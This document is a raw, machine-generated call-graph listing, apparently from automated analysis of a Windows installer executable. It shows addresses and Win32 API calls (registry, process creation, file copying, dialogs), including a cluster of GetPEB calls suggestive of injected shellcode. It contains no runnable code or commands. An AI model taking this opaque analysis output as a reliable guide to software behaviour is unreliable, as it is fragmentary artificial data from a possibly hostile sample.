4074->4084 4078 403e37 19 API calls 4075->4078 4076->4077 4081 4039c3 4077->4081 4082 4039ab ShowWindow 4077->4082 4083 403af2 SetClassLongA 4078->4083 4080 403e83 SendMessageA 4079->4080 4085 403ab2 4079->4085 4109 403b74 4080->4109 4086 4039e5 4081->4086 4087 4039cb DestroyWindow 4081->4087 4082->4081 4088 40140b 2 API calls 4083->4088 4089 403b3a 4084->4089 4091 4039ea SetWindowLongA 4086->4091 4092 4039fb 4086->4092 4090 403dc0 4087->4090 4088->4074 4089->4079 4093 403b3e SendMessageA 4089->4093 4090->4085 4101 403df1 ShowWindow 4090->4101 4091->4085 4096 403a72 4092->4096 4097 403a07 GetDlgItem 4092->4097 4093->4085 4094 40140b 2 API calls 4094->4109 4095 403dc2 DestroyWindow EndDialog 4095->4090 4100 403e9e 8 API calls 4096->4100 4098 403a37 4097->4098 4099 403a1a SendMessageA IsWindowEnabled 4097->4099 4103 403a44 4098->4103 4104 403a8b SendMessageA 4098->4104 4105 403a57 4098->4105 4113 403a3c 4098->4113 4099->4085 4099->4098 4100->4085 4101->4085 4102 405aa7 18 API calls 4102->4109 4103->4104 4103->4113 4104->4096 4107 403a74 4105->4107 4108 403a5f 4105->4108 4106 403e10 SendMessageA 4106->4096 4110 40140b 2 API calls 4107->4110 4112 40140b 2 API calls 4108->4112 4109->4085 4109->4094 4109->4095 4109->4102 4111 403e37 19 API calls 4109->4111 4114 403e37 19 API calls 4109->4114 4129 403d02 DestroyWindow 4109->4129 4110->4113 4111->4109 4112->4113 4113->4096 4113->4106 4115 403bef GetDlgItem 4114->4115 4116 403c04 4115->4116 4117 403c0c ShowWindow EnableWindow 4115->4117 4116->4117 4138 403e59 EnableWindow 4117->4138 4119 403c36 EnableWindow 4122 403c4a 4119->4122 4120 403c4f GetSystemMenu EnableMenuItem SendMessageA 4121 403c7f SendMessageA 4120->4121 4120->4122 4121->4122 4122->4120 4139 403e6c SendMessageA 4122->4139 4140 405a85 lstrcpynA 4122->4140 4125 403cad lstrlenA 4126 405aa7 18 API calls 4125->4126 4127 403cbe SetWindowTextA 4126->4127 4128 401389 2 API calls 4127->4128 4128->4109 4129->4090 4130 403d1c CreateDialogParamA 4129->4130 4130->4090 4131 403d4f 4130->4131 4132 403e37 19 API calls 4131->4132 4133 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4132->4133 4134 401389 2 API calls 4133->4134 4135 403da0 4134->4135 4135->4085 4136 403da8 ShowWindow 4135->4136 4137 403e83 SendMessageA 4136->4137 4137->4090 4138->4119 4139->4122 4140->4125 4141 402164 4142 4029e8 18 API calls 4141->4142 4143 40216a 4142->4143 4144 4029e8 18 API calls 4143->4144 4145 402173 4144->4145 4146 4029e8 18 API calls 4145->4146 4147 40217c 4146->4147 4148 405d7c 2 API calls 4147->4148 4149 402185 4148->4149 4150 402196 lstrlenA lstrlenA 4149->4150 4151 402189 4149->4151 4153 404e23 25 API calls 4150->4153 4152 404e23 25 API calls 4151->4152 4155 402191 4152->4155 4154 4021d2 SHFileOperationA 4153->4154 4154->4151 4154->4155 4156 4019e6 4157 4029e8 18 API calls 4156->4157 4158 4019ef ExpandEnvironmentStringsA 4157->4158 4159 401a03 4158->4159 4161 401a16 4158->4161 4160 401a08 lstrcmpA 4159->4160 4159->4161 4160->4161 4162 4021e6 4163 402200 4162->4163 4164 4021ed 4162->4164 4165 405aa7 18 API calls 4164->4165 4166 4021fa 4165->4166 4167 405346 MessageBoxIndirectA 4166->4167 4167->4163 4175 401c6d 4176 4029cb 18 API calls 4175->4176 4177 401c73 IsWindow 4176->4177 4178 4019d6 4177->4178 4179 4025ed 4180 4025f4 4179->4180 4181 40287d 4179->4181 4182 4025fa FindClose 4180->4182 4182->4181 4183 40266e 4184 4029e8 18 API calls 4183->4184 4186 40267c 4184->4186 4185 402692 4188 40573d 2 API calls 4185->4188 4186->4185 4187 4029e8 18 API calls 4186->4187 4187->4185 4189 402698 4188->4189 4209 40575c GetFileAttributesA CreateFileA 4189->4209 4191 4026a5 4192 4026b1 GlobalAlloc 4191->4192 4193 40274e 4191->4193 4196 402745 CloseHandle 4192->4196 4197 4026ca 4192->4197 4194 402756 DeleteFileA 4193->4194 4195 402769 4193->4195 4194->4195 4196->4193 4210 4031da SetFilePointer 4197->4210 4199 4026d0 4200 4031a8 ReadFile 4199->4200 4201 4026d9 GlobalAlloc 4200->4201 4202 4026e9 4201->4202 4203 40271d WriteFile GlobalFree 4201->4203 4204 402f01 47 API calls 4202->4204 4205 402f01 47 API calls 4203->4205 4208 4026f6 4204->4208 4206 402742 4205->4206 4206->4196 4207 402714 GlobalFree 4207->4203 4208->4207 4209->4191 4210->4199 4211 40276f 4212 4029cb 18 API calls 4211->4212 4213 402775 4212->4213 4214 4027b0 4213->4214 4215 402799 4213->4215 4222 40264e 4213->4222 4218 4027c6 4214->4218 4219 4027ba 4214->4219 4216 4027ad 4215->4216 4217 40279e 4215->4217 4226 4059e3 wsprintfA 4216->4226 4225 405a85 lstrcpynA 4217->4225 4221 405aa7 18 API calls 4218->4221 4220 4029cb 18 API calls 4219->4220 4220->4222 4221->4222 4225->4222 4226->4222 4227 4014f0 SetForegroundWindow 4228 40287d 4227->4228 4229 404772 GetDlgItem GetDlgItem 4230 4047c6 7 API calls 4229->4230 4234 4049e3 4229->4234 4231 40486c DeleteObject 4230->4231 4232 40485f SendMessageA 4230->4232 4233 404877 4231->4233 4232->4231 4235 4048ae 4233->4235 4236 405aa7 18 API calls 4233->4236 4244 404acd 4234->4244 4263 404a57 4234->4263 4282 4046f2 SendMessageA 4234->4282 4237 403e37 19 API calls 4235->4237 4239 404890 SendMessageA SendMessageA 4236->4239 4241 4048c2 4237->4241 4238 404b7c 4240 404b85 SendMessageA 4238->4240 4246 404b91 4238->4246 4239->4233 4240->4246 4248 403e37 19 API calls 4241->4248 4242 4049d6 4243 403e9e 8 API calls 4242->4243 4250 404d6c 4243->4250 4244->4238 4244->4242 4249 404b26 SendMessageA 4244->4249 4245 404abf SendMessageA 4245->4244 4251 404ba3 ImageList_Destroy 4246->4251 4252 404baa 4246->4252 4260 404bba 4246->4260 4264 4048d0 4248->4264 4249->4242 4254 404b3b SendMessageA 4249->4254 4251->4252 4255 404bb3 GlobalFree 4252->4255 4252->4260 4253 404d20 4253->4242 4258 404d32 ShowWindow GetDlgItem ShowWindow 4253->4258 4257 404b4e 4254->4257 4255->4260 4256 4049a4 GetWindowLongA SetWindowLongA 4259 4049bd 4256->4259 4266 404b5f SendMessageA 4257->4266 4258->4242 4261 4049c3 ShowWindow 4259->4261 4262 4049db 4259->4262 4260->4253 4265 40140b 2 API calls 4260->4265 4276 404bec 4260->4276 4280 403e6c SendMessageA 4261->4280 4281 403e6c SendMessageA 4262->4281 4263->4244 4263->4245 4264->4256 4267 40499e 4264->4267 4270 40491f SendMessageA 4264->4270 4271 40495b SendMessageA 4264->4271 4272 40496c SendMessageA 4264->4272 4265->4276 4266->4238 4267->4256 4267->4259 4270->4264 4271->4264 4272->4264 4273 404cf6 InvalidateRect 4273->4253 4274 404d0c 4273->4274 4287 404610 4274->4287 4275 404c1a SendMessageA 4279 404c30 4275->4279 4276->4275 4276->4279 4278 404ca4 SendMessageA SendMessageA 4278->4279 4279->4273 4279->4278 4280->4242 4281->4234 4283 404751 SendMessageA 4282->4283 4284 404715 GetMessagePos ScreenToClient SendMessageA 4282->4284 4285 404749 4283->4285 4284->4285 4286 40474e 4284->4286 4285->4263 4286->4283 4288 40462a 4287->4288 4289 405aa7 18 API calls 4288->4289 4290 40465f 4289->4290 4291 405aa7 18 API calls 4290->4291 4292 40466a 4291->4292 4293 405aa7 18 API calls 4292->4293 4294 40469b lstrlenA wsprintfA SetDlgItemTextA 4293->4294 4294->4253 4295 404d73 4296 404d81 4295->4296 4297 404d98 4295->4297 4298 404d87 4296->4298 4313 404e01 4296->4313 4299 404da6 IsWindowVisible 4297->4299 4305 404dbd 4297->4305 4300 403e83 SendMessageA 4298->4300 4302 404db3 4299->4302 4299->4313 4303 404d91 4300->4303 4301 404e07 CallWindowProcA 4301->4303 4304 4046f2 5 API calls 4302->4304 4304->4305 4305->4301 4314 405a85 lstrcpynA 4305->4314 4307 404dec 4315 4059e3 wsprintfA 4307->4315 4309 404df3 4310 40140b 2 API calls 4309->4310 4311 404dfa 4310->4311 4316 405a85 lstrcpynA 4311->4316 4313->4301 4314->4307 4315->4309 4316->4313 4317 19f1ad 4319 19f20c 4317->4319 4331 19ea5f GetPEB 4317->4331 4320 19f2f7 4319->4320 4322 19f304 4319->4322 4330 19f2ba 4319->4330 4332 19f4dd 4320->4332 4322->4330 4345 19e5ff 4322->4345 4324 19f40a 4325 19f477 4324->4325 4326 19e5ff 4 API calls 4324->4326 4324->4330 4327 19e5ff 4 API calls 4325->4327 4326->4324 4328 19f496 4327->4328 4328->4330 4354 19e54e 4328->4354 4331->4319 4363 19ea5f GetPEB 4332->4363 4334 19f4eb 4335 19f69e 4334->4335 4344 19f5f4 4334->4344 4364 19e700 4334->4364 4337 19e5ff 4 API calls 4335->4337 4335->4344 4338 19f6ea 4337->4338 4339 19f744 4338->4339 4340 19e5ff 4 API calls 4338->4340 4338->4344 4341 19e5ff 4 API calls 4339->4341 4340->4338 4342 19f75e 4341->4342 4343 19e54e 4 API calls 4342->4343 4342->4344 4343->4344 4344->4330 4346 19e61a 4345->4346 4347 19ea9e GetPEB 4346->4347 4348 19e63b 4347->4348 4349 19e6cd 4348->4349 4350 19e643 4348->4350 4388 19e518 4349->4388 4351 19e79a 3 API calls 4350->4351 4353 19e6b4 4351->4353 4353->4324 4355 19e569 4354->4355 4356 19ea9e GetPEB 4355->4356 4357 19e58a 4356->4357 4358 19e58e 4357->4358 4359 19e5d4 4357->4359 4361 19e79a 3 API calls 4358->4361 4391 19e52a 4359->4391 4362 19e5c9 4361->4362 4362->4330 4363->4334 4365 19e713 4364->4365 4373 19ea9e GetPEB 4365->4373 4367 19e734 4368 19e738 4367->4368 4369 19e77e 4367->4369 4375 19e79a GetPEB 4368->4375 4379 19e53c 4369->4379 4372 19e773 4372->4335 4374 19eac1 4373->4374 4374->4367 4376 19e7ff 4375->4376 4382 19eadc GetPEB 4376->4382 4378 19e873 4378->4372 4380 19e79a 3 API calls 4379->4380 4381 19e546 4380->4381 4381->4372 4383 19eaef 4382->4383 4385 19eb03 4383->4385 4386 19e9ae GetPEB 4383->4386 4385->4378 4387 19e9d9 4386->4387 4387->4383 4389 19e79a 3 API calls 4388->4389 4390 19e522 4389->4390 4390->4353 4392 19e79a 3 API calls 4391->4392 4393 19e534 4392->4393 4393->4362 4394 404275 4395 4042b3 4394->4395 4396 4042a6 4394->4396 4398 4042bc GetDlgItem 4395->4398 4431 40431f 4395->4431 4455 40532a GetDlgItemTextA 4396->4455 4400 4042d0 4398->4400 4399 4042ad 4402 405ce3 5 API calls 4399->4402 4404 4042e4 SetWindowTextA 4400->4404 4410 40560c 4 API calls 4400->4410 4401 404403 4405 40458f 4401->4405 4457 40532a GetDlgItemTextA 4401->4457 4402->4395 4408 403e37 19 API calls 4404->4408 4409 403e9e 8 API calls 4405->4409 4406 405aa7 18 API calls 4411 404395 SHBrowseForFolderA 4406->4411 4407 40442f 4412 405659 18 API calls 4407->4412 4413 404302 4408->4413 4414 4045a3 4409->4414 4415 4042da 4410->4415 4411->4401 4416 4043ad CoTaskMemFree 4411->4416 4417 404435 4412->4417 4418 403e37 19 API calls 4413->4418 4415->4404 4421 405578 3 API calls 4415->4421 4419 405578 3 API calls 4416->4419 4458 405a85 lstrcpynA 4417->4458 4420 404310 4418->4420 4422 4043ba 4419->4422 4456 403e6c SendMessageA 4420->4456 4421->4404 4425 4043f1 SetDlgItemTextA 4422->4425 4430 405aa7 18 API calls 4422->4430 4425->4401 4426 404318 4428 405da3 3 API calls 4426->4428 4427 40444c 4429 405da3 3 API calls 4427->4429 4428->4431 4438 404454 4429->4438 4432 4043d9 lstrcmpiA 4430->4432 4431->4401 4431->4405 4431->4406 4432->4425 4435 4043ea lstrcatA 4432->4435 4433 40448e 4459 405a85 lstrcpynA 4433->4459 4435->4425 4436 404497 4437 40560c 4 API calls 4436->4437 4439 40449d GetDiskFreeSpaceA 4437->4439 4438->4433 4441 4055bf 2 API calls 4438->4441 4443 4044e1 4438->4443 4442 4044bf MulDiv 4439->4442 4439->4443 4441->4438 4442->4443 4444 40453e 4443->4444 4445 404610 21 API calls 4443->4445 4446 404561 4444->4446 4448 40140b 2 API calls 4444->4448 4447 404530 4445->4447 4460 403e59 EnableWindow 4446->4460 4450 404540 SetDlgItemTextA 4447->4450 4451 404535 4447->4451 4448->4446 4450->4444 4453 404610 21 API calls 4451->4453 4452 40457d 4452->4405 4461 40420a 4452->4461 4453->4444 4455->4399 4456->4426 4457->4407 4458->4427 4459->4436 4460->4452 4462 404218 4461->4462 4463 40421d SendMessageA 4461->4463 4462->4463 4463->4405 4464 4022f5 4465 4022fb 4464->4465 4466 4029e8 18 API calls 4465->4466 4467 40230d 4466->4467 4468 4029e8 18 API calls 4467->4468 4469 402317 RegCreateKeyExA 4468->4469 4470 402341 4469->4470 4474 40264e 4469->4474 4471 402359 4470->4471 4472 4029e8 18 API calls 4470->4472 4473 402365 4471->4473 4476 4029cb 18 API calls 4471->4476 4475 402352 lstrlenA 4472->4475 4477 402380 RegSetValueExA 4473->4477 4478 402f01 47 API calls 4473->4478 4475->4471 4476->4473 4479 402396 RegCloseKey 4477->4479 4478->4477 4479->4474 4481 4027f5 4482 4029cb 18 API calls 4481->4482 4483 4027fb 4482->4483 4484 40282c 4483->4484 4486 40264e 4483->4486 4487 402809 4483->4487 4485 405aa7 18 API calls 4484->4485 4484->4486 4485->4486 4487->4486 4489 4059e3 wsprintfA 4487->4489 4489->4486 4490 4024f8 4491 4029cb 18 API calls 4490->4491 4492 402502 4491->4492 4493 402536 ReadFile 4492->4493 4494 40257a 4492->4494 4495 40258a 4492->4495 4498 402578 4492->4498 4493->4492 4493->4498 4499 4059e3 wsprintfA 4494->4499 4497 4025a0 SetFilePointer 4495->4497 4495->4498 4497->4498 4499->4498 4500 4016fa 4501 4029e8 18 API calls 4500->4501 4502 401701 SearchPathA 4501->4502 4503 40171c 4502->4503 4504 4014fe 4505 401506 4504->4505 4507 401519 4504->4507 4506 4029cb 18 API calls 4505->4506 4506->4507 4508 403f7f 4509 403f95 4508->4509 4517 4040a2 4508->4517 4511 403e37 19 API calls 4509->4511 4510 404111 4512 4041e5 4510->4512 4513 40411b GetDlgItem 4510->4513 4514 403feb 4511->4514 4519 403e9e 8 API calls 4512->4519 4515 404131 4513->4515 4516 4041a3 4513->4516 4518 403e37 19 API calls 4514->4518 4515->4516 4523 404157 6 API calls 4515->4523 4516->4512 4524 4041b5 4516->4524 4517->4510 4517->4512 4520 4040e6 GetDlgItem SendMessageA 4517->4520 4522 403ff8 CheckDlgButton 4518->4522 4531 4041e0 4519->4531 4539 403e59 EnableWindow 4520->4539 4537 403e59 EnableWindow 4522->4537 4523->4516 4527 4041bb SendMessageA 4524->4527 4528 4041cc 4524->4528 4525 40410c 4529 40420a SendMessageA 4525->4529 4527->4528 4528->4531 4532 4041d2 SendMessageA 4528->4532 4529->4510 4530 404016 GetDlgItem 4538 403e6c SendMessageA 4530->4538 4532->4531 4534 40402c SendMessageA 4535 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4534->4535 4536 40404a GetSysColor 4534->4536 4535->4531 4536->4535 4537->4530 4538->4534 4539->4525 4540 401000 4541 401037 BeginPaint GetClientRect 4540->4541 4542 40100c DefWindowProcA 4540->4542 4544 4010f3 4541->4544 4545 401179 4542->4545 4546 401073 CreateBrushIndirect FillRect DeleteObject 4544->4546 4547 4010fc 4544->4547 4546->4544 4548 401102 CreateFontIndirectA 4547->4548 4549 401167 EndPaint 4547->4549 4548->4549 4550 401112 6 API calls 4548->4550 4549->4545 4550->4549 4565 401b06 4566 401b13 4565->4566 4567 401b57 4565->4567 4568 4021ed 4566->4568 4574 401b2a 4566->4574 4569 401b80 GlobalAlloc 4567->4569 4570 401b5b 4567->4570 4571 405aa7 18 API calls 4568->4571 4572 405aa7 18 API calls 4569->4572 4576 401b9b 4570->4576 4586 405a85 lstrcpynA 4570->4586 4573 4021fa 4571->4573 4572->4576 4579 405346 MessageBoxIndirectA 4573->4579 4584 405a85 lstrcpynA 4574->4584 4578 401b6d GlobalFree 4578->4576 4579->4576 4580 401b39 4585 405a85 lstrcpynA 4580->4585 4582 401b48 4587 405a85 lstrcpynA 4582->4587 4584->4580 4585->4582 4586->4578 4587->4576 4588 402607 4589 40260a 4588->4589 4591 402622 4588->4591 4590 402617 FindNextFileA 4589->4590 4590->4591 4592 402661 4590->4592 4594 405a85 lstrcpynA 4592->4594 4594->4591 3904 401389 3906 401390 3904->3906 3905 4013fe 3906->3905 3907 4013cb MulDiv SendMessageA 3906->3907 3907->3906 4602 401c8a 4603 4029cb 18 API calls 4602->4603 4604 401c91 4603->4604 4605 4029cb 18 API calls 4604->4605 4606 401c99 GetDlgItem 4605->4606 4607 4024aa 4606->4607 4608 40248e 4609 4029e8 18 API calls 4608->4609 4610 402495 4609->4610 4613 40575c GetFileAttributesA CreateFileA 4610->4613 4612 4024a1 4613->4612 4614 402012 4615 4029e8 18 API calls 4614->4615 4616 402019 4615->4616 4617 4029e8 18 API calls 4616->4617 4618 402023 4617->4618 4619 4029e8 18 API calls 4618->4619 4620 40202c 4619->4620 4621 4029e8 18 API calls 4620->4621 4622 402036 4621->4622 4623 4029e8 18 API calls 4622->4623 4625 402040 4623->4625 4624 402054 CoCreateInstance 4627 402129 4624->4627 4630 402073 4624->4630 4625->4624 4626 4029e8 18 API calls 4625->4626 4626->4624 4628 401423 25 API calls 4627->4628 4629 40215b 4627->4629 4628->4629 4630->4627 4631 402108 MultiByteToWideChar 4630->4631 4631->4627 4632 402215 4633 40221d 4632->4633 4635 402223 4632->4635 4634 4029e8 18 API calls 4633->4634 4634->4635 4636 4029e8 18 API calls 4635->4636 4638 402233 4635->4638 4636->4638 4637 402241 4639 4029e8 18 API calls 4637->4639 4638->4637 4640 4029e8 18 API calls 4638->4640 4641 40224a WritePrivateProfileStringA 4639->4641 4640->4637 4642 401595 4643 4029e8 18 API calls 4642->4643 4644 40159c SetFileAttributesA 4643->4644 4645 4015ae 4644->4645 4646 401d95 4647 4029cb 18 API calls 4646->4647 4648 401d9b 4647->4648 4649 4029cb 18 API calls 4648->4649 4650 401da4 4649->4650 4651 401db6 EnableWindow 4650->4651 4652 401dab ShowWindow 4650->4652 4653 40287d 4651->4653 4652->4653 4654 401e95 4655 4029e8 18 API calls 4654->4655 4656 401e9c 4655->4656 4657 405d7c 2 API calls 4656->4657 4658 401ea2 4657->4658 4660 401eb4 4658->4660 4661 4059e3 wsprintfA 4658->4661 4661->4660 4662 401696 4663 4029e8 18 API calls 4662->4663 4664 40169c GetFullPathNameA 4663->4664 4665 4016b3 4664->4665 4671 4016d4 4664->4671 4668 405d7c 2 API calls 4665->4668 4665->4671 4666 4016e8 GetShortPathNameA 4667 40287d 4666->4667 4669 4016c4 4668->4669 4669->4671 4672 405a85 lstrcpynA 4669->4672 4671->4666 4671->4667 4672->4671 4680 402419 4690 402af2 4680->4690 4682 402423 4683 4029cb 18 API calls 4682->4683 4684 40242c 4683->4684 4685 402443 RegEnumKeyA 4684->4685 4686 40244f RegEnumValueA 4684->4686 4688 40264e 4684->4688 4687 402468 RegCloseKey 4685->4687 4686->4687 4686->4688 4687->4688 4691 4029e8 18 API calls 4690->4691 4692 402b0b 4691->4692 4693 402b19 RegOpenKeyExA 4692->4693 4693->4682 4694 402299 4695 4022c9 4694->4695 4696 40229e 4694->4696 4698 4029e8 18 API calls 4695->4698 4697 402af2 19 API calls 4696->4697 4699 4022a5 4697->4699 4700 4022d0 4698->4700 4701 4029e8 18 API calls 4699->4701 4704 4022e6 4699->4704 4705 402a28 RegOpenKeyExA 4700->4705 4702 4022b6 RegDeleteValueA RegCloseKey 4701->4702 4702->4704 4707 402a53 4705->4707 4713 402a9f 4705->4713 4706 402a79 RegEnumKeyA 4706->4707 4708 402a8b RegCloseKey 4706->4708 4707->4706 4707->4708 4709 402ab0 RegCloseKey 4707->4709 4711 402a28 3 API calls 4707->4711 4710 405da3 3 API calls 4708->4710 4709->4713 4712 402a9b 4710->4712 4711->4707 4712->4713 4714 402acb RegDeleteKeyA 4712->4714 4713->4704 4714->4713 4715 401d1b GetDC GetDeviceCaps 4716 4029cb 18 API calls 4715->4716 4717 401d37 MulDiv 4716->4717 4718 4029cb 18 API calls 4717->4718 4719 401d4c 4718->4719 4720 405aa7 18 API calls 4719->4720 4721 401d85 CreateFontIndirectA 4720->4721 4722 4024aa 4721->4722 4723 401e1b 4724 4029e8 18 API calls 4723->4724 4725 401e21 4724->4725 4726 404e23 25 API calls 4725->4726 4727 401e2b 4726->4727 4728 4052e5 2 API calls 4727->4728 4731 401e31 4728->4731 4729 401e87 CloseHandle 4733 40264e 4729->4733 4730 401e50 WaitForSingleObject 4730->4731 4732 401e5e GetExitCodeProcess 4730->4732 4731->4729 4731->4730 4731->4733 4734 405ddc 2 API calls 4731->4734 4735 401e70 4732->4735 4736 401e79 4732->4736 4734->4730 4738 4059e3 wsprintfA 4735->4738 4736->4729 4738->4736 3441 401721 3442 4029e8 18 API calls 3441->3442 3443 401728 3442->3443 3447 40578b 3443->3447 3445 40172f 3446 40578b 2 API calls 3445->3446 3446->3445 3448 405796 GetTickCount GetTempFileNameA 3447->3448 3449 4057c2 3448->3449 3450 4057c6 3448->3450 3449->3448 3449->3450 3450->3445 4739 4023a1 4740 402af2 19 API calls 4739->4740 4741 4023ab 4740->4741 4742 4029e8 18 API calls 4741->4742 4743 4023b4 4742->4743 4744 4023be RegQueryValueExA 4743->4744 4749 40264e 4743->4749 4745 4023e4 RegCloseKey 4744->4745 4746 4023de 4744->4746 4745->4749 4746->4745 4750 4059e3 wsprintfA 4746->4750 4750->4745 4751 401922 4752 4029e8 18 API calls 4751->4752 4753 401929 lstrlenA 4752->4753 4754 4024aa 4753->4754 3590 403225 #17 SetErrorMode OleInitialize 3660 405da3 GetModuleHandleA 3590->3660 3594 403293 GetCommandLineA 3665 405a85 lstrcpynA 3594->3665 3596 4032a5 GetModuleHandleA 3597 4032bc 3596->3597 3598 4055a3 CharNextA 3597->3598 3599 4032d0 CharNextA 3598->3599 3605 4032dd 3599->3605 3600 403346 3601 403359 GetTempPathA 3600->3601 3666 4031f1 3601->3666 3603 40336f 3606 403393 DeleteFileA 3603->3606 3607 403373 GetWindowsDirectoryA lstrcatA 3603->3607 3604 4055a3 CharNextA 3604->3605 3605->3600 3605->3604 3611 403348 3605->3611 3674 402c5b GetTickCount GetModuleFileNameA 3606->3674 3608 4031f1 11 API calls 3607->3608 3610 40338f 3608->3610 3610->3606 3613 40340d 3610->3613 3759 405a85 lstrcpynA 3611->3759 3612 4033a4 3612->3613 3615 4033fd 3612->3615 3618 4055a3 CharNextA 3612->3618 3776 4035a6 3613->3776 3704 4035e3 3615->3704 3620 4033bb 3618->3620 3629 4033d8 3620->3629 3630 40343c lstrcatA lstrcmpiA 3620->3630 3621 403426 3624 405346 MessageBoxIndirectA 3621->3624 3622 40350b 3623 40358e ExitProcess 3622->3623 3625 405da3 3 API calls 3622->3625 3627 403434 ExitProcess 3624->3627 3628 40351a 3625->3628 3631 405da3 3 API calls 3628->3631 3760 405659 3629->3760 3630->3613 3633 403458 CreateDirectoryA SetCurrentDirectoryA 3630->3633 3634 403523 3631->3634 3636 40347a 3633->3636 3637 40346f 3633->3637 3638 405da3 3 API calls 3634->3638 3784 405a85 lstrcpynA 3636->3784 3783 405a85 lstrcpynA 3637->3783 3641 40352c 3638->3641 3643 40357a ExitWindowsEx 3641->3643 3650 40353a GetCurrentProcess 3641->3650 3643->3623 3646 403587 3643->3646 3644 4033f2 3775 405a85 lstrcpynA 3644->3775 3645 405aa7 18 API calls 3648 4034aa DeleteFileA 3645->3648 3814 40140b 3646->3814 3651 4034b7 CopyFileA 3648->3651 3657 403488 3648->3657 3652 40354a 3650->3652 3651->3657 3652->3643 3653 4034ff 3655 4057d3 38 API calls 3653->3655 3655->3613 3656 405aa7 18 API calls 3656->3657 3657->3645 3657->3653 3657->3656 3659 4034eb CloseHandle 3657->3659 3785 4057d3 3657->3785 3811 4052e5 CreateProcessA 3657->3811 3659->3657 3661 405dca GetProcAddress 3660->3661 3662 405dbf LoadLibraryA 3660->3662 3663 403268 SHGetFileInfoA 3661->3663 3662->3661 3662->3663 3664 405a85 lstrcpynA 3663->3664 3664->3594 3665->3596 3667 405ce3 5 API calls 3666->3667 3668 4031fd 3667->3668 3669 403207 3668->3669 3670 405578 3 API calls 3668->3670 3669->3603 3671 40320f CreateDirectoryA 3670->3671 3672 40578b 2 API calls 3671->3672 3673 403223 3672->3673 3673->3603 3817 40575c GetFileAttributesA CreateFileA 3674->3817 3676 402c9e 3703 402cab 3676->3703 3818 405a85 lstrcpynA 3676->3818 3678 402cc1 3819 4055bf lstrlenA 3678->3819 3682 402cd2 GetFileSize 3683 402dd3 3682->3683 3702 402ce9 3682->3702 3684 402bc5 32 API calls 3683->3684 3686 402dda 3684->3686 3685 4031a8 ReadFile 3685->3702 3688 402e16 GlobalAlloc 3686->3688 3686->3703 3824 4031da SetFilePointer 3686->3824 3687 402e6e 3690 402bc5 32 API calls 3687->3690 3689 402e2d 3688->3689 3695 40578b 2 API calls 3689->3695 3690->3703 3692 402df7 3693 4031a8 ReadFile 3692->3693 3696 402e02 3693->3696 3694 402bc5 32 API calls 3694->3702 3697 402e3e CreateFileA 3695->3697 3696->3688 3696->3703 3698 402e78 3697->3698 3697->3703 3825 4031da SetFilePointer 3698->3825 3700 402e86 3701 402f01 47 API calls 3700->3701 3701->3703 3702->3683 3702->3685 3702->3687 3702->3694 3702->3703 3703->3612 3705 405da3 3 API calls 3704->3705 3706 4035f7 3705->3706 3707 4035fd 3706->3707 3708 40360f 3706->3708 3835 4059e3 wsprintfA 3707->3835 3709 40596c 3 API calls 3708->3709 3710 403630 3709->3710 3712 40364e lstrcatA 3710->3712 3714 40596c 3 API calls 3710->3714 3713 40360d 3712->3713 3826 403897 3713->3826 3714->3712 3717 405659 18 API calls 3718 403676 3717->3718 3719 4036ff 3718->3719 3721 40596c 3 API calls 3718->3721 3720 405659 18 API calls 3719->3720 3722 403705 3720->3722 3728 4036a2 3721->3728 3723 403715 LoadImageA 3722->3723 3724 405aa7 18 API calls 3722->3724 3725 403740 RegisterClassA 3723->3725 3726 4037c9 3723->3726 3724->3723 3729 40377c SystemParametersInfoA CreateWindowExA 3725->3729 3758 4037d3 3725->3758 3730 40140b 2 API calls 3726->3730 3727 4036be lstrlenA 3732 4036f2 3727->3732 3733 4036cc lstrcmpiA 3727->3733 3728->3719 3728->3727 3731 4055a3 CharNextA 3728->3731 3729->3726 3734 4037cf 3730->3734 3735 4036bc 3731->3735 3737 405578 3 API calls 3732->3737 3733->3732 3736 4036dc GetFileAttributesA 3733->3736 3739 403897 19 API calls 3734->3739 3734->3758 3735->3727 3738 4036e8 3736->3738 3740 4036f8 3737->3740 3738->3732 3742 4055bf 2 API calls 3738->3742 3743 4037e0 3739->3743 3836 405a85 lstrcpynA 3740->3836 3742->3732 3744 403864 3743->3744 3745 4037e8 ShowWindow LoadLibraryA 3743->3745 3837 404ef5 OleInitialize 3744->3837 3746 403807 LoadLibraryA 3745->3746 3747 40380e GetClassInfoA 3745->3747 3746->3747 3749 403822 GetClassInfoA RegisterClassA 3747->3749 3750 403838 DialogBoxParamA 3747->3750 3749->3750 3752 40140b 2 API calls 3750->3752 3751 40386a 3753 403886 3751->3753 3754 40386e 3751->3754 3755 403860 3752->3755 3756 40140b 2 API calls 3753->3756 3757 40140b 2 API calls 3754->3757 3754->3758 3755->3758 3756->3758 3757->3758 3758->3613 3759->3601 3852 405a85 lstrcpynA 3760->3852 3762 40566a 3763 40560c 4 API calls 3762->3763 3764 405670 3763->3764 3765 4033e3 3764->3765 3766 405ce3 5 API calls 3764->3766 3765->3613 3774 405a85 lstrcpynA 3765->3774 3772 405680 3766->3772 3767 4056ab lstrlenA 3768 4056b6 3767->3768 3767->3772 3769 405578 3 API calls 3768->3769 3771 4056bb GetFileAttributesA 3769->3771 3770 405d7c 2 API calls 3770->3772 3771->3765 3772->3765 3772->3767 3772->3770 3773 4055bf 2 API calls 3772->3773 3773->3767 3774->3644 3775->3615 3777 4035c1 3776->3777 3778 4035b7 CloseHandle 3776->3778 3779 4035d5 3777->3779 3780 4035cb CloseHandle 3777->3780 3778->3777 3853 4053aa 3779->3853 3780->3779 3783->3636 3784->3657 3786 405da3 3 API calls 3785->3786 3787 4057de 3786->3787 3788 40583b GetShortPathNameA 3787->3788 3791 405930 3787->3791 3896 40575c GetFileAttributesA CreateFileA 3787->3896 3790 405850 3788->3790 3788->3791 3790->3791 3793 405858 wsprintfA 3790->3793 3791->3657 3792 40581f CloseHandle GetShortPathNameA 3792->3791 3794 405833 3792->3794 3795 405aa7 18 API calls 3793->3795 3794->3788 3794->3791 3796 405880 3795->3796 3897 40575c GetFileAttributesA CreateFileA 3796->3897 3798 40588d 3798->3791 3799 40589c GetFileSize GlobalAlloc 3798->3799 3800 405929 CloseHandle 3799->3800 3801 4058ba ReadFile 3799->3801 3800->3791 3801->3800 3802 4058ce 3801->3802 3802->3800 3898 4056d1 lstrlenA 3802->3898 3805 4058e3 3903 405a85 lstrcpynA 3805->3903 3806 40593d 3807 4056d1 4 API calls 3806->3807 3809 4058f1 3807->3809 3810 405904 SetFilePointer WriteFile GlobalFree 3809->3810 3810->3800 3812 405320 3811->3812 3813 405314 CloseHandle 